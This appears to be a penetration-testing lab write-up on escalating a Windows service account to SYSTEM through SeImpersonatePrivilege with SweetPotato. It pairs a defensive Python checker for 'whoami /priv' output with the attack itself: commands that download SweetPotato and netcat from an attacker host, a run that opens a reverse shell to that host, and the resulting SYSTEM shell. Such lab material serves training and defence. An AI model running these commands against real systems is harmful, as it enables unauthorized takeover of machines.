SweetPotato


The current user, apache, is a service account with SeImpersonatePrivilege enabled, which makes the target vulnerable to the potato family of token-impersonation exploits.
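The condition described above is something an auditor or defender wants to check before an attacker does. The following is an added example, not code from the write-up or from the SweetPotato project: it parses the output of `whoami /priv` (a constructed sample is embedded; the hypothetical `assess_token_abuse_risk` and `risk_level` helpers are mine) and flags the two privileges that let a process turn an impersonated client's token into a new process. One caveat worth building in: `whoami /priv` shows a privilege as Disabled when it is merely not enabled in the current token, but it is still assigned and a process can enable it, so the assessment treats any listed token-abuse privilege as held.

```python
import re
from typing import Dict, List

# Constructed sample of `whoami /priv` output for a service account.
# This is illustrative data, not output captured from the page's target.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that allow a process to run code under another client's token.
# These are the primitive the potato family of local privilege escalations
# relies on, so their presence on a low-privileged service account is a finding.
TOKEN_ABUSE_PRIVILEGES = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
}

# One privilege row: name, free-text description, then the State column.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Map privilege name -> State ('Enabled'/'Disabled') from `whoami /priv` output.

    Header, separator and blank lines do not match the row pattern and are skipped.
    """
    privs: Dict[str, str] = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def assess_token_abuse_risk(privs: Dict[str, str]) -> List[str]:
    """Return the token-abuse privileges assigned to the token, in any state.

    A 'Disabled' entry is still assigned to the token; the process can enable
    it itself, so it is reported just like an 'Enabled' one.
    """
    return sorted(p for p in privs if p in TOKEN_ABUSE_PRIVILEGES)


def risk_level(privs: Dict[str, str], is_service_account: bool = True) -> str:
    """Coarse triage: service accounts exposed to untrusted input (web servers,
    database engines) are the usual potato targets, so rate them highest."""
    held = assess_token_abuse_risk(privs)
    if not held:
        return "low"
    return "high" if is_service_account else "medium"


if __name__ == "__main__":
    parsed = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    print("Token-abuse privileges held:", assess_token_abuse_risk(parsed))
    print("Risk level for a service account:", risk_level(parsed))
```

In practice you would feed the function the real output of `whoami /priv` run as the service identity; the mitigation side is to remove the privilege from accounts that do not need it (via the User Rights Assignment policy) or to run the exposed service under a virtual account or a lower-privileged identity that is not granted it.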

PS C:\tmp> iwr -Uri http://192.168.45.197/SweetPotato.exe -Outfile C:\tmp\SweetPotato.exe
PS C:\tmp> iwr -Uri http://192.168.45.197/nc64.exe -Outfile C:\tmp\nc64.exe

Delivery complete

PS C:\tmp> cmd /c C:\tmp\SweetPotato.exe -e EfsRpc -p C:\tmp\nc64.exe -a "192.168.45.197 1234 -e cmd"
SweetPotato by @_EthicalChaos_
  Orignal RottenPotato code and exploit by @foxglovesec
  Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
  PrintSpoofer discovery and original exploit by @itm4n
  EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] Attempting NP impersonation using method EfsRpc to launch C:\tmp\nc64.exe
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c947908d-8dc3-4e0e-8000-d8d7cc875952/\c947908d-8dc3-4e0e-8000-d8d7cc875952\c947908d-8dc3-4e0e-8000-d8d7cc875952
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

Executing with the EfsRpc method

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.197] from (UNKNOWN) [192.168.138.169] 50167
Microsoft Windows [Version 10.0.17763.2029]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
 whoami
nt authority\system
 
C:\Windows\system32> hostname
 hostname
CRAFT
 
C:\Windows\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::2cf0:b138:c2e1:e87b%5
   IPv4 Address. . . . . . . . . . . : 192.168.138.169
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.138.254

System-level compromise